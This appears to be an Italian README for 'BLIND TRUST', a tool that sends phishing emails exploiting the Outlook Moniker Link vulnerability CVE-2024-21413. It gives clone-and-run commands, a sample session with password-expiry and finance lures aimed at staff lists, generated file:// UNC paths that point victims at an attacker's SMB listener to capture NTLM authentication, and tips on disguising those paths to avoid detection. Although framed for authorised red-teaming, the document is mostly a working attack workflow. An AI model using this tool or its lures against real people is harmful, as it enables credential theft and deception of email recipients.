
Uno strumento di ricerca di sicurezza per simulare campagne di phishing mirate utilizzando CVE-2024-21413 (Moniker Link).
Uno strumento di ricerca per la sicurezza progettato per simulare campagne di phishing mirate utilizzando la vulnerabilità CVE-2024-21413 Moniker Link. Pensato per operazioni di red team autorizzate, penetration testing e formazione sulla consapevolezza della sicurezza.
BLIND TRUST è un framework per campagne di phishing che aiuta i team di sicurezza a comprendere e testare le proprie difese contro attacchi email sofisticati. Sfrutta la tecnica Moniker Link per bypassare la Protected View di Outlook, fornendo una simulazione realistica che le organizzazioni possono utilizzare per rafforzare la propria postura di sicurezza.
Questo strumento automatizza il flusso di lavoro end-to-end di una campagna, dalla configurazione all'invio delle email, mantenendo la sicurezza operativa attraverso percorsi UNC personalizzabili e opzioni di pretesto flessibili.
Le organizzazioni devono comprendere le tecniche di attacco reali per difendersi efficacemente. TRUST consente:
.txt in stile wordlist# Clona il repository
git clone https://github.com/h1ssbl1tz/Blind-Trust.git
cd TRUST
# Esegui lo strumento
python3 TRUST_v7.py
Lo strumento utilizza solo moduli della libreria standard Python:
getpass - Input sicuro della password
html - Escapamento HTML
ipaddress - Validazione indirizzi IP
logging - Logging strutturato
os - Operazioni su file
re - Espressioni regolari
signal - Gestione segnali
smtplib - Protocollo email SMTP
sys - Utilità di sistema
time - Operazioni temporali
dataclasses - Modellazione della configurazione
email - Costruzione email MIME
typing - Suggerimenti di tipo
Nessun pacchetto esterno richiesto: funziona ovunque con Python 3.7+.
python3 TRUST_v7.py
Segui la procedura guidata interattiva attraverso 5 passaggi:
Caricare i target da [f]ile o [i]nput direttamente?: i
Indirizzo/i email target: [email protected], [email protected]
Oggetto email [Security Update Required]: Urgente: Avviso Scadenza Password
Nome visualizzato (campo Da) [Microsoft Security Center]: Team IT Sicurezza
Corpo email: La tua password scade tra 24 ore. Aggiornala immediatamente.
Host UNC (IP o dominio) [192.168.1.100]: it-internal.company.com
Nome condivisione UNC [updates]: patches
Nome exploit UNC [patch]: kb_security_2024
Crea targets.txt:
# Dipartimento Finanze
[email protected]
[email protected]
[email protected]
# Contabilità
[email protected]
[email protected]
Poi esegui:
Caricare i target da [f]ile o [i]nput direttamente?: f
Percorso del file target: targets.txt
[+] Caricati 5 target da targets.txt
Oggetto email: Revisione Finanziaria Q3 - Azione Richiesta
Nome visualizzato: Team Operazioni Finanziarie
Corpo email: Si prega di rivedere il bilancio finanziario Q3 allegato e fornire approvazione.
Host UNC: finance-internal.company.com
Condivisione UNC: quarterly
Exploit UNC: q3_financial_report
Percorso UNC generato: file://finance-internal.company.com/quarterly!q3_financial_report
Due opzioni:
.txt con un'email per riga, commenti che iniziano con #È qui che si evitano firme ovvie:
finance-internal.company.com) invece di un semplice IPquarterly, updates, documentsq3_report, security_patch, training_documentRisultato: Invece dell'ovvio \\192.168.1.100\share!exploit, ottieni qualcosa come file://finance-internal.company.com/quarterly!q3_report.
Inizio
↓
[PASSO 1] Richiedi email attaccante e password SMTP
↓
[PASSO 2] Richiedi IP listener SMB
↓
[PASSO 3] Carica email target (file o input)
↓
↓→ Per ogni target:
│ - Valida formato email
│ - Controlla duplicati
│
[PASSO 4] Richiedi pretesto email
│ - Oggetto, nome Da, corpo testo
│
[PASSO 5] Richiedi personalizzazione percorso UNC
│ - Host, condivisione, nome exploit
│
↓
[COSTRUISCI] Costruisci oggetto di configurazione
↓
[VALIDAZIONE] Controlla che tutti i campi siano presenti e validi
↓
[RIEPILOGO] Mostra riepilogo pre-invio per revisione
↓
[CONFERMA] L'utente approva o annulla
↓
[INVIA] Per ogni target:
│ - Costruisci email MIME con Moniker Link personalizzato
│ - Tenta consegna SMTP con logica di ripetizione
│ - Registra successo/fallimento per target
│
↓
[REPORT] Mostra risultati della campagna (consegnati vs falliti)
↓
Esci
CVE-2024-21413 (Moniker Link) è una vulnerabilità di Outlook che permette di incorporare URL file:// con il carattere !. Quando un utente clicca su tale link, Outlook tenta di accedere al percorso UNC, innescando un tentativo di autenticazione NTLM anche in modalità Protected View.